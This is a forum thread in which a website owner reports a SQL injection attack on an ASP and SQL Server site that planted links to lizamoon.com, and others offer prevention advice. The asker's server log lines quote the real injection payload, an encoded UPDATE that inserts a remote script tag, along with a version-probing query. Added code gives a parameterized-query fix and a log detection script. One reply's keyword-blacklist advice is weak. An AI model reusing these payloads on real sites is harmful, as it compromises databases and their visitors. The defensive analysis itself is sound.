garnett-dickinson
asked on
Recent SQL Injection Attack
Hi,
Found out recently that my website (ASP and SQL Server database) has been attacked by SQL Injection. It has inserted a script link to lizamoon.com/ur.php into database fields that are either 'text' or 'nvarchar' fields.
Searching on Google reveals that a lot of other ASP and ASP.NET sites have been hit as well.
I have now cleared out the database.
Has anyone got any suggestions of how to make sure this does not happen again, or has anyone else had this exact attack happen to them, and how and what have they done to prevent this?
Thanks in advance for your most grateful help.
Here, read this: http://www.codeproject.com/KB/database/SqlInjectionAttacks.aspx
Hello
This is a very common problem being faced by webmasters who are running websites coded long back. The major issue in these websites is that the code doesn't validate input from the user before passing it to the data servers.
The solution is to use stored procedures instead of direct SQL statements. Or else, validate inputs before passing them to your queries. Avoid keywords like ";, select, update, insert, delete" etc. from the user inputs.
These are the very basic pointers to start working on it. If you are not a programmer, you will need to hire a programmer to handle this issue for you.
Let me know if I can help any further on this issue.
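One way to apply the two fixes named in this answer (keep user input out of the SQL text, and validate it), as an added example that is not part of the original thread. It uses bound parameters rather than a stored procedure, with Python's sqlite3 standing in for the ASP and SQL Server stack; the products table, its rows, the hostile input and the product-code format inferred from MG0011 are assumptions.

```python
import re
import sqlite3

# Assumed product-code format, inferred from the "MG0011" value in the thread.
PRODUCT_CODE = re.compile(r"[A-Z]{2}[0-9]{4}")


def make_db():
    """Build an in-memory stand-in for the shop database (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (code TEXT PRIMARY KEY, name TEXT)")
    db.executemany(
        "INSERT INTO products VALUES (?, ?)",
        [("MG0011", "Mug"), ("MG0012", "Glass"), ("TS0001", "T-shirt")],
    )
    return db


def lookup_concatenated(db, prod):
    """Vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT code, name FROM products WHERE code = '" + prod + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, prod):
    """Fixed pattern: the value is bound as data and never parsed as SQL."""
    return db.execute(
        "SELECT code, name FROM products WHERE code = ?", (prod,)
    ).fetchall()


def lookup_validated(db, prod):
    """Allowlist check first, then the bound query (defence in depth)."""
    if not PRODUCT_CODE.fullmatch(prod):
        raise ValueError("rejected product code")
    return lookup_parameterized(db, prod)


if __name__ == "__main__":
    db = make_db()
    hostile = "MG0011' OR '1'='1"  # constructed input, not taken from the logs
    print(len(lookup_concatenated(db, hostile)))   # every row comes back
    print(len(lookup_parameterized(db, hostile)))  # no row has that code
```

In classic ASP the equivalent of lookup_parameterized is an ADODB.Command with parameters appended through CreateParameter, instead of a SQL string built from Request.QueryString.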
Sounds like it is also 'cross site scripting', which you might also want to look into.
ASKER
I have just noticed that it has happened again, not as many fields this time. I can't alter some of the scripts that I have on the site as they are part of an off-the-shelf shopping cart package that we've purchased. However, it has also affected tables in the database that are not part of the shopping cart package.
What is even more strange is that it is the only database that has been affected on this SQL Server, 1 out of 4 databases. I have also changed FTP and admin passwords since the first attack.
This is leading me to believe that this is not SQL injection, unless some people think otherwise.
ASKER
I have just noticed (just after the second attack) the difference between the SQL Server database that was hit and the ones on the same server that were not: it was the permissions of the database. I had got 'Delete', 'Execute', 'Insert', and 'Select' ticked. I have not got them ticked in my other database and I can still add, update, etc. in my webpages.
I still believe it is SQL injection.
Would you like to share the URL to look into?
ASKER
Sorry, do you mean the URL of the site that got attacked?
Yes, the URL of the site which is attacked, so that we can look into the security loopholes in it.
Hello,
Here are 4 very useful links from OWASP:
http://www.owasp.org/index.php/SQL_Injection
http://www.owasp.org/index.php/Guide_to_SQL_Injection
http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
http://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
I use another strategy when programming ASP.NET applications: I use a data persistence framework such as Gentle Framework that completely protects against SQL injection, even if it is not the purpose at all of this kind of framework.
ASKER
I have looked over the logs and found out which page they have used to inject the script code:
2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(108)%2Bchar(105)%2Bchar(122)%2Bchar(97)%2Bchar(109)%2Bchar(111)%2Bchar(111)%2Bchar(110)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 80 - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax)
I have looked further into it and found a few entries using the highlighted IP address, which I suspect is to find out which page they can use:
2011-02-11 08:26:05 <<my server ip>> GET /<<my page>>.asp prod=MG0011'+or+1=@@version--|11|80040e07|Conversion_failed_when_converting_the_nvarchar_value_'Microsoft_SQL_Server_2008_(RTM)_-_10.0.1600.22_(X64)__+Jul__9_2008_14:17:44__+Copyright_(c)_1988-2008_Microsoft_Corporation_+Web_Edition_(64-bit)_on_Windows_NT_5.2_<X64>_(Build_3790:_Service_Pack_2)_'_to_data_type_int. 80 - 95.64.9.18 HTTP/1.1
I have now put in a script which removes 'bad words' such as 'SELECT', 'INSERT', 'UPDATE', etc. from the query string passed to this page.
I'd rather not share the URL thanks
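The log review described in the post above, as an added example that is not part of the original thread: a small triage script that flags requests whose query string looks like the two entries quoted and spells out char(N)+char(N) chains so the injected text can be read. The sample lines, page name, IP addresses and rule names are constructed for the example; the field order is assumed from the quoted entries.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in the field order of the entries quoted above
# (date time s-ip method uri-stem uri-query port user c-ip version agent).
SAMPLE_LOG = """\
2011-02-11 08:26:05 192.0.2.10 GET /item.asp prod=MG0011'+or+1=@@version--|11|80040e07|Conversion_failed_when_converting_the_nvarchar_value 80 - 198.51.100.7 HTTP/1.1 -
2011-03-29 17:56:49 192.0.2.10 GET /item.asp prod=MG0011'+update+tblMembers+set+Forename=REPLACE(Forename,cast(char(60)%2Bchar(98)%2Bchar(62)+as+varchar(8000)),char(32))-- 80 - 198.51.100.7 HTTP/1.1 -
2011-03-29 18:01:12 192.0.2.10 GET /item.asp prod=MG0012 80 - 203.0.113.5 HTTP/1.1 -
"""

# \b keeps "varchar(8000)" from being read as a char() call.
CHAR_CHAIN = re.compile(r"\bchar\(\d+\)(?:\s*\+\s*char\(\d+\))*", re.I)
RULES = {
    "quote-then-sql": re.compile(
        r"'\s*(?:or|and|update|insert|delete|select|exec)\b", re.I),
    "version-probe": re.compile(r"@@version", re.I),
    "asp-sql-error": re.compile(r"\|80040e07\|", re.I),  # code seen in the thread
}


def decode_char_chains(text):
    """Replace char(N)+char(N)+... with the string it spells, for readability."""
    def spell(match):
        return "".join(chr(int(n)) for n in re.findall(r"\d+", match.group()))
    return CHAR_CHAIN.sub(spell, text)


def triage(log_text):
    """Return one finding per request whose query string matches a rule."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) < 10:
            continue  # skip W3C header lines and short or blank lines
        query = unquote_plus(parts[5])  # '+' becomes space, %2B becomes '+'
        hits = sorted(name for name, rx in RULES.items() if rx.search(query))
        if CHAR_CHAIN.search(query):
            hits.append("char-chain")
        if hits:
            findings.append({"when": parts[0] + " " + parts[1],
                             "page": parts[4], "client": parts[8],
                             "rules": hits,
                             "decoded": decode_char_chains(query)})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding["when"], finding["client"], finding["rules"])
```

Grouping the findings by client and page gives the list of entry points to fix and the date range to check the database against.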